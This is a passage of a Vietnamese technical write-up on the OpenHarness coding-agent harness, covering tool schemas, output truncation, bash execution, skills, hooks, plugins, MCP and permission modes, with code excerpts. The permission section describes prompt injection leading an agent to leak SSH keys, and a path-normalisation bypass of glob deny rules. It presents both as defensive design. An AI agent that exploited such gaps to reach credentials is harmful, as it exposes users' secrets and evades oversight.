from abc
      import ABC, abstractmethod from
      typing import ClassVar from pydantic import BaseModel class BaseTool(ABC): name: ClassVar[str] description:
      ClassVar[str] input_model: ClassVar[type[BaseModel]] is_read_only:
      ClassVar[bool] = False @classmethod def to_schema(cls) -> dict: """JSON
      Schema auto-generated from Pydantic input model.""" return { "name": cls.name,
      "description": cls.description, "input_schema": cls.input_model.model_json_schema(), }
      @abstractmethod async def
      execute(self, args: BaseModel, ctx: ToolContext)
      -> ToolResult: """Execute tool with validated args;
      return result or error.""" ... # Concrete
      usage class ReadInput(BaseModel): file_path: str offset: int |
      None = None limit: int |
      None = None class ReadTool(BaseTool): name
      = "Read" description = "Read a
      file..." input_model = ReadInput is_read_only = True async def execute(self, args: ReadInput, ctx) -> ToolResult:
      ...
Tại sao quan trọng: Viết tool Pydantic-first cho 3 lợi ích: (1) validation free — args đến tool đã pass schema; (2) JSON schema auto — không cần viết tay schema cho mỗi tool (chống drift); (3) IDE friendly — tool method có type hints đúng. Hằng is_read_only đặc biệt quan trọng: permission checker dùng nó để quyết định có cần confirm hay không (read tool luôn OK trong DEFAULT mode).

Code example (generic)

from pydantic import BaseModel, Field from abc
      import ABC, abstractmethod class BaseTool(ABC): name:
      str input_model: type[BaseModel] @classmethod
      def schema(cls): return {"name": cls.name, "input_schema": cls.input_model.model_json_schema()}
      @abstractmethod async def
      execute(self, args: BaseModel) -> dict: ... class GrepInput(BaseModel): pattern: str = Field(description="regex
      pattern") path: str | None = None class GrepTool(BaseTool): name
      = "Grep" input_model = GrepInput async def execute(self, args:
      GrepInput): return await
      run_ripgrep(args.pattern, args.path)
Ưu điểm
  • Single-source-of-truth schema (model_json_schema)
  • Validation errors có chất lượng cao của Pydantic
  • mypy strict chấp nhận mọi path
  • Field descriptions vào docstring LLM-readable
Nhược điểm
  • Pydantic v2 còn đầu jump từ v1 (breaking changes)
  • JSON schema đôi khi generate quá phức tạp (Union types), confuse model
  • Không có cơ chế description_template như opencode .txt
  • Overhead minor cho mỗi validation call

T11. Per-tool output truncation + UTF-8 normalization

C.2
Files: tools/bash_tool.py L129 · tools/web_fetch_tool.py L61 · tools/file_read_tool.py L57 · Limits: bash 12KB, web 50KB, file 200 lines default

Code từ OpenHarness

#
      tools/bash_tool.py MAX_BASH_OUTPUT_BYTES = 12 * 1024 #
      12KB def _truncate_output(raw: bytes, limit: int =
      MAX_BASH_OUTPUT_BYTES) -> str: # 1. Decode UTF-8 with
      replace policy (never raise on bad bytes) text = raw.decode("utf-8", errors="replace")
      if len(text) <= limit: return text # 2. Keep head + tail,
      drop middle with clear marker half = limit // 2 return ( text[:half] + f"\n\n... [output truncated:
      {len(text) - limit} bytes omitted] ...\n\n" + text[-half:] ) # tools/web_fetch_tool.py MAX_WEB_FETCH_BYTES = 50 * 1024 #
      50KB — web pages can be larger #
      tools/file_read_tool.py — different strategy: line-based not
      byte-based DEFAULT_READ_LIMIT = 200 # lines MAX_LINE_LENGTH = 2000
      # truncate long lines def
      _read_with_limits(path: Path, offset: int, limit:
      int) -> str: lines = [] with path.open("r", encoding="utf-8",
      errors="replace") as f:
      for i, line in
      enumerate(f): if i < offset: continue if i >= offset +
      limit: break if len(line)
      > MAX_LINE_LENGTH: line = line[:MAX_LINE_LENGTH] + "... [line truncated]\n" lines.append(f"{i+1}\t{line}") return "".join(lines)
Tại sao quan trọng: Tool output luôn có nguy cơ overflow — build log 100MB, CSV 1GB, binary file. Mỗi tool có policy riêng: bash 12KB (keep head+tail vì error hay ở cuối), web 50KB (HTML parse), read 200 lines (code reading UX). UTF-8 errors="replace" bất biến — không bao giờ raise UnicodeDecodeError giữa stream (phòng khi binary file lẫn vào input).

Code example (generic)

def truncate_mid(text: str,
      limit: int) -> str: if len(text) <= limit:
      return text half = limit // 2 dropped = len(text) - limit return text[:half] + f"\n... [{dropped} chars truncated] ...\n" +
      text[-half:] def safe_decode(raw: bytes) -> str: return raw.decode("utf-8",
      errors="replace") # Per-tool
      policy LIMITS = {"Bash": 12*1024, "WebFetch": 50*1024, "Read": 200} # line count for
      Read
Ưu điểm
  • Prevent context bomb from single tool call
  • Per-tool tuning — code reading khác build log
  • UTF-8 replace → never crash trên binary
  • Head+tail cho bash — error thường ở cuối, command ở đầu
Nhược điểm
  • 12KB cho bash có thể cắt ngay giữa JSON object
  • Không có "spill to file" như opencode (truncate → file path)
  • Limit hardcoded — không config per session
  • Line-based cho Read kém khi file 1 dòng siêu dài

T12. Bash interactive preflight + PTY + graceful timeout

C.3
File: src/openharness/tools/bash_tool.py · Lines: 145–208 · Timeout: 600s · Terminate grace: 2s

Code từ OpenHarness

import
      pty, os, shlex, signal, asyncio INTERACTIVE_MARKERS = ( ("npm create", "--yes"), ("npx create", "--yes"), ("pnpm create", "--yes"),
      ("yarn create", "--yes"), ("bun create", "--yes"), ("pip install",
      "--quiet"), # may prompt for
      confirmation ... ) def _preflight_interactive_command(cmd: str) -> str |
      None: """Return error msg if cmd
      would prompt interactively.""" tokens = shlex.split(cmd) joined =
      " ".join(tokens).lower() for marker, required_flag in
      INTERACTIVE_MARKERS: if marker in joined and required_flag
      not in joined: return
      f"Command likely requires
      interaction. Add {required_flag} or equivalent." return None async def run_bash(cmd: str, timeout: float = 600) -> BashResult: # 1. Preflight
      check — reject scaffolds without --yes/--ci if err := _preflight_interactive_command(cmd): return BashResult(exit_code=2,
      stderr=err, is_error=True) # 2.
      Allocate PTY so that TTY-detecting programs work (vim -c, ansi
      colors) master_fd, slave_fd = pty.openpty() proc = await asyncio.create_subprocess_exec( "bash", "-c", cmd,
      stdin=slave_fd, stdout=slave_fd, stderr=slave_fd, #
      merge stderr→stdout preexec_fn=os.setsid, # own
      process group ) # 3. Read from master fd with
      overall timeout output = bytearray() try:
      await asyncio.wait_for(_read_pty(master_fd,
      output), timeout=timeout) except
      asyncio.TimeoutError: # 4. Graceful: SIGTERM → wait 2s →
      SIGKILL os.killpg(os.getpgid(proc.pid), signal.SIGTERM) try: await
      asyncio.wait_for(proc.wait(), timeout=2.0) except asyncio.TimeoutError:
      os.killpg(os.getpgid(proc.pid), signal.SIGKILL) return BashResult(exit_code=-1,
      output=bytes(output), timed_out=True) return BashResult(exit_code=proc.returncode,
      output=bytes(output))
Tại sao quan trọng: 3 trick sống còn khi LLM chạy bash: (1) Preflight reject npm create X không có --yes → tránh agent stuck chờ user confirm mãi; (2) PTY cho tool như git, pip, npm chạy đúng mode (khác khi chạy trong TTY vs pipe); (3) Process group + graceful terminate → child process cũng bị kill, tránh zombie. Timeout 600s dài nhưng 2s grace terminate trước khi SIGKILL.

Code example (generic)

import asyncio, shlex, os, signal, pty INTERACTIVE =
      ("npm create", "npx
      create", "yarn create") async def safe_bash(cmd: str,
      timeout=600): for m in INTERACTIVE: if m in cmd.lower() and "--yes" not in cmd: return {"error": f"'{m}' requires --yes to run
      non-interactively"} master, slave = pty.openpty() proc = await asyncio.create_subprocess_exec( "bash", "-c", cmd,
      stdin=slave, stdout=slave, stderr=slave, preexec_fn=os.setsid, ) try: await
      asyncio.wait_for(proc.wait(), timeout) except
      asyncio.TimeoutError: os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
      try: await
      asyncio.wait_for(proc.wait(), 2) except asyncio.TimeoutError:
      os.killpg(os.getpgid(proc.pid), signal.SIGKILL) return {"exit":
      proc.returncode}
Ưu điểm
  • Preflight bắt được phần lớn scaffold prompts
  • PTY làm git/pip/npm output đúng format
  • Process group kill — zombie-free
  • Graceful 2s terminate cho chance process flush stdout
Nhược điểm
  • INTERACTIVE_MARKERS không đầy đủ — dễ miss tool mới
  • PTY không chạy trên Windows (cần alternative)
  • Stderr merge vào stdout — mất tín hiệu tách biệt
  • 600s timeout quá dài cho nhiều command nhanh

T13. Ripgrep-first Glob/Grep với Python fallback

C.4
Files: tools/glob_tool.py L65–122 · tools/grep_tool.py L37–83

Code từ OpenHarness

import
      shutil, subprocess, fnmatch from pathlib import Path RG_BIN = shutil.which("rg") # detect at import time
      async def glob_files(pattern: str, root: Path, *,
      respect_gitignore: bool = True) -> list[Path]:
      if RG_BIN: # rg --files --glob
      PATTERN — respects .gitignore by default args = [RG_BIN, "--files", "--glob", pattern,
      str(root)] if not
      respect_gitignore: args.insert(1, "--no-ignore") # Include hidden files
      if inside a git repo if (root / ".git").is_dir(): args.insert(1, "--hidden") proc = await asyncio.create_subprocess_exec( *args,
      stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.DEVNULL )
      stdout, _ = await proc.communicate() return [Path(line) for line
      in stdout.decode().splitlines()] # --- Python fallback --- # Respect
      .gitignore via pathspec library; else just glob results = [] for p in root.rglob("*"): if not p.is_file(): continue if
      fnmatch.fnmatch(p.name, pattern) or
      fnmatch.fnmatch(str(p), pattern): if respect_gitignore and
      _is_gitignored(p, root): continue
      results.append(p) return results async def grep_content(pattern:
      str, root: Path, *, case_insensitive=False) ->
      list[GrepMatch]: if RG_BIN: args = [RG_BIN, "--json", "--with-filename",
      pattern, str(root)] if
      case_insensitive: args.append("-i") ... else: # Python fallback with
      re.compile() regex = re.compile(pattern, re.IGNORECASE if case_insensitive else 0) ...
Tại sao quan trọng: Ripgrep nhanh hơn Python ~10-100x, lại tôn trọng .gitignore mặc định. OpenHarness detect rg tại import time (shutil.which) — có thì dùng, không có fallback Python. Special: trong git repo thì --hidden tự động (để tìm .github/, .vscode/). Python fallback dùng fnmatch + rglob — chậm nhưng không đòi hỏi dependency.

Code example (generic)

import shutil, asyncio from
      pathlib import Path RG = shutil.which("rg") async def fast_glob(pattern: str, root: Path): if RG: args = [RG, "--files",
      "--glob", pattern, str(root)] if (root/".git").is_dir(): args.insert(1, "--hidden") proc = await asyncio.create_subprocess_exec(*args,
      stdout=asyncio.subprocess.PIPE) out, _ = await
      proc.communicate() return [Path(l) for l in
      out.decode().splitlines()] # fallback import fnmatch return [p for p in root.rglob("*") if p.is_file() and fnmatch.fnmatch(p.name, pattern)]
Ưu điểm
  • 10-100x nhanh hơn Python glob trên repo lớn
  • .gitignore respect out-of-box
  • Graceful fallback khi không có rg
  • JSON output dễ parse
Nhược điểm
  • Hidden file behavior khác giữa rg và Python fallback (inconsistent)
  • Không có rg-specific features trong Python fallback (PCRE2, multiline)
  • Subprocess overhead cho query nhỏ
  • Path với space phải quote cẩn thận

D. Extension Ecosystem 4 kỹ thuật

OpenHarness có 4 surface để mở rộng: skills (markdown), hooks (policy/observability), plugins (bundle skill+hook+mcp), MCP (external tool server). Tất cả đều được discover từ filesystem, zero dependency configuration registry.

T14. Markdown-based skill system + frontmatter

D.1
File: src/openharness/skills/loader.py · Lines: 27–51 · Scan paths: bundled + ~/.openharness/skills/<skill>/SKILL.md + plugin skills

Code từ OpenHarness

import
      yaml, re from pathlib import Path from dataclasses
      import dataclass FRONTMATTER_RE = re.compile(r"^---\n(.*?)\n---\n(.*)",
      re.DOTALL) @dataclass class Skill: name: str
      description: str path: Path body: str def load_skills(cwd: Path) -> list[Skill]: skills:
      list[Skill] = [] seen_names: set[str] = set()
      for base in
      _skill_roots(cwd): # bundled + ~/.openharness/skills +
      plugins if not base.is_dir(): continue for skill_dir in sorted(base.iterdir()): manifest = skill_dir / "SKILL.md" if not
      manifest.exists(): continue raw =
      manifest.read_text(encoding="utf-8") match =
      FRONTMATTER_RE.match(raw) if match: meta =
      yaml.safe_load(match.group(1)) or {} body = match.group(2).strip() name = meta.get("name") or skill_dir.name
      description = meta.get("description", "") else: #
      Fallback: derive from first heading + first paragraph name =
      skill_dir.name first_heading = re.search(r"^# (.+)$", raw, re.M) title =
      first_heading.group(1) if
      first_heading else name first_para =
      raw.split("\n\n")[1]
      if "\n\n" in raw else "" description = first_para[:200] body = raw # Dedup by name,
      first wins (bundled > user > plugin priority) if name in seen_names: continue seen_names.add(name)
      skills.append(Skill(name=name, description=description, path=manifest,
      body=body)) return skills
Tại sao quan trọng: Skill = một folder chứa SKILL.md với frontmatter mô tả. System prompt sẽ inject description của tất cả skills có sẵn — LLM đọc description rồi "kích hoạt" skill nếu relevant (tức LLM request read file SKILL.md để đọc full instruction). Thiết kế này giống Claude Code skills. Fallback khi thiếu frontmatter giúp test dễ (chỉ cần một file SKILL.md là enough). Priority first-wins: built-in ưu tiên, user override sau, plugin cuối.

Code example (generic)

import yaml, re from pathlib
      import Path def discover_skills(roots: list[Path]): skills = []; seen =
      set() for root in roots: if not root.is_dir():
      continue for d in sorted(root.iterdir()): mf = d / "SKILL.md" if not mf.exists():
      continue raw = mf.read_text() m = re.match(r"^---\n(.*?)\n---\n(.*)", raw,
      re.DOTALL) meta, body = (yaml.safe_load(m.group(1)), m.group(2)) if m else ({}, raw) name =
      meta.get("name", d.name) if name in seen: continue # first-wins
      seen.add(name) skills.append({"name": name, "description": meta.get("description", ""), "body": body}) return
      skills
Ưu điểm
  • User-friendly — chỉ cần biết markdown
  • Git-friendly — diff/review dễ
  • Frontmatter machine-readable, body human-readable
  • Layered priority (builtin/user/plugin)
Nhược điểm
  • Skill lớn tốn token khi LLM load body
  • Không có versioning / dependency giữa skills
  • Priority có thể surprise (first-wins khó debug khi nhiều plugin)
  • Fallback parse bất định khi heading không chuẩn

→ Phân tích sâu T14: Markdown-based skill system + frontmatter discovery

T15. Hook lifecycle system (6 events · 4 types · hot reload)

D.2
Files: src/openharness/hooks/events.py, hooks/executor.py · Reloader: HookReloader watches mtime

Code từ OpenHarness

from enum
      import Enum class HookEvent(Enum): SESSION_START = "session_start" SESSION_END = "session_end" PRE_COMPACT = "pre_compact" POST_COMPACT = "post_compact" PRE_TOOL_USE = "pre_tool_use" POST_TOOL_USE = "post_tool_use" class HookType(Enum): COMMAND = "command" # exec shell command, check
      exit code PROMPT = "prompt" # LLM judges payload vs policy HTTP = "http" # POST payload to
      webhook AGENT = "agent" # spawn subagent for decision class HookExecutor: async def execute(self, event:
      HookEvent, payload: dict) -> HookResult: self._maybe_reload() # hot-reload when files changed blocked, reasons =
      False, [] for hook in self._hooks_for(event): res = await hook.run(payload) reasons.append(res.message)
      if res.blocked: blocked = True if hook.type ==
      HookType.COMMAND: break #
      short-circuit for command hooks return
      HookResult(blocked=blocked, reason=";
      ".join(reasons)) class HookReloader: """Watch hook file
      mtime; reload config when modified.""" def
      maybe_reload(self): for
      path, old_mtime in list(self._mtimes.items()): new_mtime =
      path.stat().st_mtime if new_mtime != old_mtime:
      log.info("reloading hooks from %s", path)
      self._hooks = self._parse(path) self._mtimes[path] =
      new_mtime
Tại sao quan trọng: Hook lifecycle 6 event là đủ cho hầu hết policy scenarios: session bound (SESSION_START/END), compaction tracking (PRE/POST_COMPACT), tool enforcement (PRE/POST_TOOL_USE). 4 hook types cho phép user chọn cơ chế: command = simple shell, prompt = LLM-based policy, HTTP = remote SIEM, agent = sophisticated reasoning. Hot reload qua mtime watch — sửa hooks.yaml không cần restart session.

Code example (generic)

import asyncio,
      subprocess from enum import Enum class HookEvent(Enum): PRE_TOOL = "pre_tool"; POST_TOOL = "post_tool" class CommandHook: def __init__(self, cmd): self.cmd = cmd async def run(self, payload):
      proc = await asyncio.create_subprocess_shell(
      self.cmd, stdin=asyncio.subprocess.PIPE, stdout=asyncio.subprocess.PIPE,
      stderr=asyncio.subprocess.PIPE, ) out, err = await
      proc.communicate(json.dumps(payload).encode()) return {"blocked":
      proc.returncode != 0, "reason": err.decode()} class
      HookExecutor: def __init__(self, hooks_by_event): self.hooks =
      hooks_by_event async def fire(self, event, payload): for
      h in self.hooks.get(event, []): r = await h.run(payload) if r["blocked"]: return r return {"blocked": False}
Ưu điểm
  • 6 lifecycle events covers compaction + tool + session
  • Hot reload — no session restart
  • 4 hook types — flexible (simple → sophisticated)
  • Short-circuit for command hooks — perf-friendly
Nhược điểm
  • LLM-based prompt hook tốn API call — latency + cost
  • Hot reload race với hook đang chạy
  • Không có "chain" semantics — mỗi hook độc lập
  • Agent hook có thể recursive call trở lại main agent

→ Phân tích sâu T15: Hook lifecycle system (6 events · 4 types · hot reload)

T16. Plugin manifest-based loading

D.3
File: src/openharness/plugins/loader.py · Lines: 104–157 · Paths: ~/.openharness/plugins/ (user) + .openharness/plugins/ (project)

Code từ OpenHarness

import
      yaml from pathlib import
      Path from dataclasses import dataclass, field @dataclass class PluginManifest: name: str version: str description:
      str skills_dir: str | None = None # relative path to skills/
      hooks_file: str | None = None # relative path to
      hooks.yaml mcp_file: str | None = None # relative path to
      mcp.json commands_dir: str | None = None # relative path to
      commands/ def load_plugins(cwd: Path) -> list[Plugin]: plugins = []
      roots = [ Path.home() / ".openharness" / "plugins", cwd / ".openharness" / "plugins", ]
      for root in roots: if not root.is_dir(): continue
      for plugin_dir in
      sorted(root.iterdir()): manifest_path = plugin_dir / "plugin.yaml" if not
      manifest_path.exists(): continue data =
      yaml.safe_load(manifest_path.read_text()) manifest =
      PluginManifest(**data) # Resolve relative paths to
      absolute skills = [] if
      manifest.skills_dir: skills_path = plugin_dir / manifest.skills_dir skills
      = _load_skills_from(skills_path) hooks = [] if
      manifest.hooks_file: hooks_path = plugin_dir / manifest.hooks_file hooks =
      _parse_hooks_yaml(hooks_path) mcp_servers = [] if
      manifest.mcp_file: mcp_path = plugin_dir / manifest.mcp_file mcp_servers =
      _parse_mcp_json(mcp_path) commands = [] if
      manifest.commands_dir: # Namespace:
      "plugin:<plugin_name>:<file_stem>" commands_path =
      plugin_dir / manifest.commands_dir for cmd_file
      in sorted(commands_path.glob("*.md")): commands.append(Command( name=f"plugin:{manifest.name}:{cmd_file.stem}",
      body=cmd_file.read_text(), )) plugins.append(Plugin( manifest=manifest,
      skills=skills, hooks=hooks, mcp_servers=mcp_servers, commands=commands, ))
      return plugins
Tại sao quan trọng: Một plugin bundle được nhiều loại extension: skills + hooks + MCP + commands. Manifest plugin.yaml chỉ list các path relative — không embed content. Command có namespace plugin:<name>:<file> để tránh conflict. Hai root: user global + project local — project override user. Đây là pattern quen thuộc của Claude Code plugins, port sang Python.

Code example (generic)

import yaml from pathlib import Path def load_plugins(roots: list[Path]) -> list: out = [] for root in roots: for d in sorted(root.glob("*")) if root.is_dir() else []: mf = d
      / "plugin.yaml" if not
      mf.exists(): continue data =
      yaml.safe_load(mf.read_text()) plugin = { "name":
      data["name"], "root": d,
      "skills": load_skills_dir(d / data.get("skills_dir", "skills")),
      "hooks": load_hooks(d / data["hooks_file"]) if
      data.get("hooks_file") else [], "mcp": load_mcp(d /
      data["mcp_file"]) if
      data.get("mcp_file") else
      [], } out.append(plugin) return out
Ưu điểm
  • Single manifest declare everything
  • Bundle skill + hook + MCP coherently
  • Namespace tránh command conflict
  • Git/filesystem distributable
Nhược điểm
  • Không có semver / dependency resolution
  • Security: plugin hook có thể exec arbitrary shell
  • No signing / verification
  • Bundled layout cứng nhắc (skills_dir fixed name)

→ Phân tích sâu T16: Plugin manifest-based loading

T17. MCP stdio + HTTP transport + dynamic Pydantic adapter

D.4
File: src/openharness/mcp/client.py · Lines: 29–95 · Aggregator: McpClientManager uses AsyncExitStack

Code từ OpenHarness

from
      contextlib import AsyncExitStack from mcp import ClientSession,
      StdioServerParameters from mcp.client.stdio import stdio_client from
      mcp.client.sse import sse_client from pydantic import
      create_model class McpClientManager: def __init__(self, server_configs): self._configs =
      server_configs self._stack: AsyncExitStack | None
      = None self._sessions: dict[str, ClientSession] = {} self._tools: list[McpTool] = [] async def
      __aenter__(self): self._stack = AsyncExitStack()
      await self._stack.__aenter__() for name, cfg in
      self._configs.items(): if cfg.transport == "stdio": params =
      StdioServerParameters(command=cfg.command, args=cfg.args, env=cfg.env)
      stream_ctx = stdio_client(params) elif
      cfg.transport == "http": stream_ctx =
      sse_client(cfg.url, headers=cfg.headers) else:
      raise ValueError(f"Unknown MCP transport: {cfg.transport}") streams =
      await self._stack.enter_async_context(stream_ctx)
      session = ClientSession(*streams) await
      self._stack.enter_async_context(session) await
      session.initialize() self._sessions[name] = session #
      Discover tools + build Pydantic adapter for each resp = await session.list_tools() for
      tool in resp.tools: InputModel =
      _build_pydantic_from_schema(tool.inputSchema, name=tool.name)
      self._tools.append(McpTool( server=name, name=f"mcp__{name}__{tool.name}",
      # namespaced tool id
      description=tool.description, input_model=InputModel, session=session, ))
      return self async def
      __aexit__(self, *exc): if
      self._stack: await self._stack.__aexit__(*exc)
      def _build_pydantic_from_schema(schema: dict, *, name: str):
      """Convert JSON schema to a dynamic Pydantic
      model.""" fields = {} for prop, spec in schema.get("properties",
      {}).items(): py_type = _json_type_to_python(spec.get("type", "string"))
      fields[prop] = (py_type, ...) # required return create_model(f"Mcp_{name}_Input", **fields)
Tại sao quan trọng: MCP cho phép OpenHarness dùng tool từ nhiều server độc lập (GitHub, Jira, Slack MCPs...). AsyncExitStack per-server đảm bảo cleanup đúng ngay cả khi một server fail init. create_model build Pydantic từ JSON schema runtime — tức tool được validate như tool native. Namespace mcp__<server>__<tool> tránh conflict giữa server có cùng tool name. Dual transport stdio+HTTP cho local subprocess hoặc remote SaaS MCP.

Code example (generic)

from contextlib import
      AsyncExitStack from pydantic import create_model class McpManager: async def __aenter__(self): self.stack = await AsyncExitStack().__aenter__() self.sessions = {}
      self.tools = [] for name, cfg in self.configs.items(): ctx = stdio_client(cfg) if cfg.transport == "stdio"
      else sse_client(cfg) streams = await self.stack.enter_async_context(ctx) sess = await
      self.stack.enter_async_context(ClientSession(*streams)) await sess.initialize() for t
      in (await
      sess.list_tools()).tools: self.tools.append({"name": f"mcp__{name}__{t.name}", "model": create_model(f"M_{t.name}", **...)}) return
      self
Ưu điểm
  • Dual transport — stdio (local) + HTTP (remote)
  • AsyncExitStack → nested cleanup an toàn
  • Dynamic Pydantic — tool MCP validate như native
  • Namespace tránh conflict
Nhược điểm
  • JSON schema → Pydantic chưa hỗ trợ allOf/oneOf phức tạp
  • Một server stuck block toàn bộ init (không có per-server timeout)
  • SSE transport không có retry built-in
  • Schema không support descriptions for enum values

→ Phân tích sâu T17: MCP stdio + HTTP transport + dynamic Pydantic adapter

E. Permission & Safety 4 kỹ thuật

Permission model của OpenHarness có 3 mode + built-in sensitive path protection + 6-layer hierarchical evaluation + async interactive approval. Đây là điểm OpenHarness cẩn thận hơn opencode: sensitive path protection không thể bị override, ngay cả trong FULL_AUTO.

T18. 3-mode permission system (DEFAULT / PLAN / FULL_AUTO)

E.1
File: src/openharness/permissions/modes.py · Hằng: PermissionMode.DEFAULT / PLAN / FULL_AUTO

Code từ OpenHarness

from enum
      import Enum class PermissionMode(Enum): DEFAULT = "default" # read OK; write &
      mutation need confirm PLAN = "plan" # only read; block all mutations (even bash read-only)
      FULL_AUTO = "full_auto" #
      everything OK (except sensitive paths) # Used in
      PermissionChecker.evaluate() — see T20 if
      self._settings.mode == PermissionMode.FULL_AUTO: return PermissionDecision(allowed=True, reason="Auto mode allows all
      tools") if is_read_only: return PermissionDecision(allowed=True, reason="read-only tools are
      allowed") if self._settings.mode ==
      PermissionMode.PLAN: return PermissionDecision(
      allowed=False, reason="Plan mode
      blocks mutating tools until the user exits plan mode", ) # DEFAULT: require confirmation for mutating tools
      return PermissionDecision( allowed=False, requires_confirmation=True, reason="Mutating tools require
      user confirmation in default mode. ...", )
Tại sao quan trọng: 3 mode cover 3 workflow: (1) DEFAULT — cẩn trọng, user-in-the-loop cho mỗi mutation; (2) PLAN — "chỉ nghĩ, không làm" cho research/brainstorm; (3) FULL_AUTO — unattended runs như cron autopilot. Mode tách biệt khỏi approval flow — checker chỉ return decision, UI chịu trách nhiệm show prompt. Giống Claude Code "auto mode" nhưng có thêm PLAN mode (opencode không có).

Code example (generic)

from
      enum import Enum class
      Mode(Enum): DEFAULT = "default"; PLAN = "plan";
      FULL_AUTO = "full_auto" def decide(mode: Mode,
      is_read_only: bool) -> str: if mode == Mode.FULL_AUTO:
      return "allow" if is_read_only: return "allow" if mode == Mode.PLAN:
      return "deny" return "confirm" # DEFAULT needs user approval
Ưu điểm
  • 3 modes cover trivial → unattended workflow
  • Mode tách biệt khỏi approval → checker pure function
  • PLAN đặc biệt hữu ích cho "research mode"
  • User intent rõ ràng — không cần edit config
Nhược điểm
  • 3 modes không đủ granular (vd: "allow bash, confirm edit")
  • FULL_AUTO có thể bị lạm dụng trên production
  • PLAN block bash read-only (git status) nếu tool self-declare mutating
  • Mode toggle không persist per project

→ Phân tích sâu T18: 3-mode permission system (DEFAULT / PLAN / FULL_AUTO)

T19. Built-in sensitive path protection (hardcoded glob)

E.2
File: src/openharness/permissions/checker.py · Lines: 14–37 · Patterns: 10+ hardcoded

Code từ OpenHarness

# Paths that are
      always denied regardless of permission mode or user config. # These protect high-value credential and key material from
      LLM-directed access # (including via prompt
      injection). Patterns use fnmatch syntax and are matched # against the fully-resolved absolute path produced by the
      query engine. SENSITIVE_PATH_PATTERNS: tuple[str, ...] = ( # SSH keys and config "*/.ssh/*", # AWS credentials
      "*/.aws/credentials", "*/.aws/config", # GCP
      credentials "*/.config/gcloud/*", # Azure credentials "*/.azure/*", # GPG keys "*/.gnupg/*", # Docker
      credentials "*/.docker/config.json", # Kubernetes credentials "*/.kube/config", # OpenHarness own
      credential stores "*/.openharness/credentials.json", "*/.openharness/copilot_auth.json", ) def evaluate(self, tool_name, *,
      is_read_only, file_path=None, command=None): # Sensitive path check runs
      FIRST, cannot be overridden if file_path:
      for candidate in
      _policy_match_paths(file_path): for pattern in SENSITIVE_PATH_PATTERNS: if
      fnmatch.fnmatch(candidate, pattern): return
      PermissionDecision( allowed=False, reason=f"Access denied: {file_path} is a
      sensitive credential path" ) # ... rest of
      evaluation ...
Tại sao quan trọng: Prompt injection có thể lừa LLM đọc ~/.ssh/id_rsa rồi paste vào response. OpenHarness đặt sensitive path check ngoài permission mode — ngay cả FULL_AUTO cũng không bypass được. 10+ pattern cover SSH/AWS/GCP/Azure/GPG/Docker/K8s/own credentials. fnmatch thay vì regex để pattern đơn giản (wildcards */), không cần escape đặc biệt.

Code example (generic)

import fnmatch from pathlib
      import Path SENSITIVE = ( "*/.ssh/*", "*/.aws/credentials", "*/.gnupg/*", "*/.kube/config", "*/.azure/*", "*/.docker/config.json", ) def
      is_sensitive_path(path: str) -> bool: # Match against both "dir" and "dir/" to catch directory
      roots normalized = path.rstrip("/")
      candidates = (normalized, normalized + "/") return any(fnmatch.fnmatch(c, pat) for c in candidates for pat in SENSITIVE) def check_permission(path,
      mode): if is_sensitive_path(path): return {"allowed": False, "reason": f"{path} is sensitive"} # ... other checks by mode ...
Ưu điểm
  • Defence-in-depth against prompt injection
  • Cannot be bypassed by mode / config
  • Standard well-known credential paths
  • fnmatch patterns — easy to audit
Nhược điểm
  • Hardcoded list — cần update khi có cloud provider mới
  • Không cover custom credential locations (~/.company-secrets/)
  • False positive: legit debug cho ~/.ssh/config
  • Không protect Windows paths (%USERPROFILE%\.ssh\)

→ Phân tích sâu T19: Built-in sensitive path protection (hardcoded glob)

T20. 6-layer hierarchical permission evaluation + path normalization

E.3
File: src/openharness/permissions/checker.py · Hàm: evaluate() · Lines: 75–169

Code từ OpenHarness

def evaluate(self, tool_name, *, is_read_only,
      file_path=None, command=None): # Layer 1: sensitive path
      protection (see T19) if file_path: for candidate in
      _policy_match_paths(file_path): for pattern in SENSITIVE_PATH_PATTERNS: if
      fnmatch.fnmatch(candidate, pattern): return
      PermissionDecision(allowed=False, reason="sensitive") # Layer 2: explicit tool
      deny list if tool_name in self._settings.denied_tools: return PermissionDecision(allowed=False, reason=f"{tool_name} is explicitly denied") #
      Layer 3: explicit tool allow list if
      tool_name in self._settings.allowed_tools: return PermissionDecision(allowed=True, reason=f"{tool_name} is explicitly allowed") # Layer 4: path rules (glob-based) if file_path and
      self._path_rules: for candidate in _policy_match_paths(file_path): for rule in self._path_rules:
      if fnmatch.fnmatch(candidate, rule.pattern): if not rule.allow: return
      PermissionDecision(allowed=False, reason=f"deny rule: {rule.pattern}")
      # Layer 5: command deny patterns (bash-specific)
      if command: for pattern
      in getattr(self._settings, "denied_commands", []): if
      isinstance(pattern, str) and fnmatch.fnmatch(command, pattern): return PermissionDecision(allowed=False, reason=f"cmd deny: {pattern}") # Layer 6:
      fall back to mode (FULL_AUTO / PLAN / DEFAULT) if self._settings.mode == PermissionMode.FULL_AUTO:
      return PermissionDecision(allowed=True) if is_read_only: return PermissionDecision(allowed=True) if self._settings.mode ==
      PermissionMode.PLAN: return
      PermissionDecision(allowed=False, reason="plan blocks mutations") return
      PermissionDecision(allowed=False,
      requires_confirmation=True) def _policy_match_paths(file_path: str) -> tuple[str, ...]: """Return path forms that
      should participate in policy matching. Appending a trailing slash lets
      glob-style deny patterns like ``*/.ssh/*`` and ``/etc/*`` match the
      directory root itself. """ normalized = file_path.rstrip("/") if not normalized: return (file_path,) return
      (normalized, normalized + "/")
Tại sao quan trọng: 6 layer đúng thứ tự quan trọng: sensitive > deny > allow > path rules > command deny > mode. Sensitive luôn win — không config nào override được. Đặc biệt tinh tế là _policy_match_paths: trả về cả "/home/x/.ssh" "/home/x/.ssh/". Vì glob tool có thể gọi với path không có trailing slash, và pattern "*/.ssh/*" sẽ không match mỗi bản — nếu không normalize, có thể bypass. Đây là lỗ hổng kinh điển mà Adversa publish cho Claude Code deny rules.

Code example (generic)

def evaluate_perm(tool, *,
      path=None, cmd=None,
      settings, mode): # Layer 1: sensitive paths
      (hardcoded) if path and is_sensitive(path): return
      deny("sensitive") # Layer 2:
      tool deny list if tool in settings.denied_tools: return
      deny("tool denied") # Layer 3:
      tool allow list if tool in settings.allowed_tools: return allow("tool allowed")
      # Layer 4: path rules if
      path and (r := match_path_rule(path,
      settings.path_rules)): if not r.allow: return deny(f"path rule: {r.pattern}") # Layer 5:
      command deny if cmd and any(fnmatch.fnmatch(cmd, p) for p in
      settings.denied_commands): return deny("command deny") # Layer 6:
      mode return mode_decision(mode,
